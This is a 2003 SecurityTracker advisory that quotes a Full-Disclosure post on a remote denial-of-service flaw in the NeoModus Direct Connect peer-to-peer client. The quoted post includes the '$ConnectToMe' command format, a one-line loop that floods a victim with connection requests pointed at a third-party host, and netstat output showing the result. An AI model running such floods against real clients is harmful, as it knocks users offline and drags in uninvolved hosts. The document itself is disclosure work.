NeoModus Direct Connect Permits Remote Denial of Service Attacks
|
|
SecurityTracker Alert ID: 1007186 |
|
SecurityTracker URL: http://securitytracker.com/id/1007186
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jul 14 2003
|
Impact:
Denial of service via network
|
|
Version(s): 1.0 build 9 tested; possibly the 1.0 build 9.1 version
|
Description:
A resource consumption vulnerability was reported in the NeoModus Direct Connect file sharing application. A remote user can cause denial of service conditions on the target system.
sec-labs team reported that a remote user can cause a connected target user's system to open a large number of connections to a specified port on a specified host with a command of the following format:
$ConnectToMe <U's username> <D's IP and port>|
This will reportedly cause denial of service conditions on the target user's system.
Only the Windows version was tested.
|
Impact:
A remote user can cause a large number of connections to be opened by the target user's system, resulting in resource starvation and denial of service conditions.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.neo-modus.com/ (Links to External Site)
|
Cause:
Resource error, State error
|
Underlying OS:
Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 14 Jul 2003 13:37:19 +0000
Subject: [Full-Disclosure] [sec-labs] Remote Denial of Service vulnerability in NeoModus
|
--=.fv8TFfM/PC1taS
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
sec-labs team proudly presents:
Remote DoS vulnerability in NeoModus Direct Connect 1.0 build 9
and probably newest version.
by Lord YuP
13/07/2003
I. BACKGROUND
Direct Connect is a windows (i've found also a linux version but
i don't have time to test it) p2p file-sharing program, well
common nowadays.
II. DESCRIPTION
Appending to aDe DC Client to Client HandShake looks like:
Client <-> Client Communication in DC. 11-05-2002. By aDe
----------------------------------------------------------
ACTIVE FILE DOWNLOAD
----------------------
D = downloader
U = uploader
H = hub
D>H: $ConnectToMe <U's username> <D's IP and port>|
H>U: $ConnectToMe <U's username> <D's IP and port>|
...bla bla ... ;)
As u can guess, the Direct Connect client after receiving
"$Connect ToMe..." command from hub, tries to connect to
specyfic IP and PORT sent by the Downloader.
The attacker (evil-downloader) can send infinite requests
to HUB with specyfic marked ip:port causing DoS attack
in the Victim's client.
Little example:
Attacker: for (;;) { dc_send("$ConnectToMe victim www.microsoft.com:%d",sample_port++); }
Client: (runned "netstat -a")
TCP jin:1993 JIN:0 LISTENING
TCP jin:1995 JIN:0 LISTENING
TCP jin:1996 JIN:0 LISTENING
TCP jin:2005 JIN:0 LISTENING
TCP jin:2006 JIN:0 LISTENING
TCP jin:2007 JIN:0 LISTENING
TCP jin:2008 JIN:0 LISTENING
TCP jin:2009 JIN:0 LISTENING
TCP jin:2010 JIN:0 LISTENING
TCP jin:2011 JIN:0 LISTENING
TCP jin:2012 JIN:0 LISTENING
TCP jin:2013 JIN:0 LISTENING
TCP jin:2014 JIN:0 LISTENING
TCP jin:2015 JIN:0 LISTENING
TCP jin:2016 JIN:0 LISTENING
TCP jin:2017 JIN:0 LISTENING
TCP jin:2018 JIN:0 LISTENING
TCP jin:2019 JIN:0 LISTENING
...and so on...
III. IMPACT
The attacked client may be DoS-ed in case of that internet connection
can be reseted/stopped, some clients may flood with the "Out of Memory"
msgboxes in case of that, system may be not working correctly, and DC
client may be terminated.
--
sec-labs team [http://sec-labs.hack.pl]
--=.fv8TFfM/PC1taS
Content-Type: application/pgp-signature
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.0 (GNU/Linux)
iD8DBQE/ErITZ4yD+a7QMvgRAi0NAKCS5mbpl++2jAyb5B9nlq4pNBftiACgjkVF
BWNQrku1u7RaoKQPkN0fuMw=
=lrBY
-----END PGP SIGNATURE-----
--=.fv8TFfM/PC1taS--
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
